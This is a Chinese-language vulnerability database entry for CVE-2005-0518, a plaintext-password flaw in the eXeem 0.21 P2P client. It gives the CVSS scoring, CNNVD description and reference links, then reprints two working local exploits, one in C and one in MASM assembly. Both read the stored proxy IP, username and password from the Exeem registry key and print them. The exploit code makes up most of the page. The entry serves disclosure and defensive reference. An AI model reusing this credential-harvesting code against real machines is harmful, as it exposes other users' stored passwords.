CVE-2005-0518
CVSS2.1
发布时间 :2005-02-23 00:00:00
修订时间 :2008-09-05 16:46:32
NMCOE    

[原文]eXeem 0.21 stores sensitive information such as passwords in plaintext in the Exeem registry key, which allows local users to gain privileges via the proxy_user and proxy_password values.


[CNNVD]eXeem Exeem注册表 键敏感信息泄露漏洞(CNNVD-200502-089)

        eXeem是新一代Peer To Peer(P2P)软件。
        eXeem 0.21将密码之类的敏感信息以纯文本格式存储在Exeem注册表键中,这可让本地用户通过获取proxy_user和proxy_password值获取特权。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0518
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0518
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-089
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1013266
(VENDOR_ADVISORY)  SECTRACK  1013266

- 漏洞信息

eXeem Exeem注册表 键敏感信息泄露漏洞
低危 未知
2005-02-23 00:00:00 2005-10-20 00:00:00
本地  
        eXeem是新一代Peer To Peer(P2P)软件。
        eXeem 0.21将密码之类的敏感信息以纯文本格式存储在Exeem注册表键中,这可让本地用户通过获取proxy_user和proxy_password值获取特权。

- 公告与补丁

        

- 漏洞信息 (834)

eXeem 0.21 Local Password Disclosure Exploit (EDBID:834)
windows local
2005-02-22 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
        proxy_username[BUFSIZE],
        proxy_password[BUFSIZE];

DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main()
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
                                                      (LPBYTE) proxy_ip, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
                                                      (LPBYTE) proxy_username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
                                                      (LPBYTE) proxy_password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               RegCloseKey(hKey);

               printf("eXeem v0.21 Local Exploit by Kozan\n");
               printf("Credits to ATmaCA\n");
               printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
               printf("Proxy IP           : %s\n",proxy_ip);
               printf("Proxy Username     : %s\n",proxy_username);
               printf("Proxy Password     : %s\n",proxy_password);

   }
       else
       {
       printf("eXeem v0.21 is not installed on your pc!\n");
   }

       return 0;
}

// milw0rm.com [2005-02-22]
		

- 漏洞信息 (844)

eXeem 0.21 Local Password Disclosure Exploit (asm) (EDBID:844)
windows local
2005-02-26 Verified
0 illwill
N/A [点击下载]
;Nothing Special other than the program doesnt encode the proxy info.

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
     literal MACRO quoted_text:VARARG
       LOCAL local_text
       .data
         local_text db quoted_text,0
       .code
       EXITM <local_text>
     ENDM
     SADD MACRO quoted_text:VARARG
       EXITM <ADDR literal(quoted_text)>
     ENDM
.data
   SubKey            db "Software\\Exeem\",0
   szIP              db "proxy_ip",0
   szUser            db "proxy_username",0
   szPass            db "proxy_password",0
   noExeem           db "eXeem v0.2X is not installed on your pc!",0
   NotFound          db "Info NOT Stored.",0
   Theoutput  db   '_______________________________________________________________',13,10
              db   '*               Exeem v0.2X Local Proxy Pass Exploit          *',13,10
              db   '*                    Based On Kozans code in C                *',13,10
              db   '*                by illwill  - xillwillx@yahoo.com            *',13,10
              db   '*_____________________________________________________________*',13,10
              db   '                      Proxy IP: %s                             ',13,10
              db   '                      UserName: %s                             ',13,10
              db   '                      Password: %s                             ',13,10,0
   KeySize    DWORD 255
.data?
    TheIPData           db 64 dup (?)
    TheUSERData         db 64 dup (?)
    ThePASSData         db 64 dup (?)
    TheReturn           DWORD ?
    strbuf              db 258 dup (0) 
.code
start:
    invoke RegOpenKeyEx, HKEY_CURRENT_USER,addr SubKey,0,KEY_READ,addr TheReturn
     .IF eax==ERROR_SUCCESS
        invoke RegQueryValueEx,TheReturn,addr szIP,0,0,addr TheIPData, addr KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheIPData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
                         .IF KeySize < 2
                             invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
                        .ENDIF
        invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
        invoke StdOut, addr strbuf
     .ELSE  
        invoke StdOut, addr noExeem  
     .ENDIF
    invoke RegCloseKey , TheReturn
   Invoke ExitProcess,0
end start

; milw0rm.com [2005-02-26]
		

- 漏洞信息

14139
eXeem Registry Local Password Disclosure
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-23 Unknow
2005-02-23 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站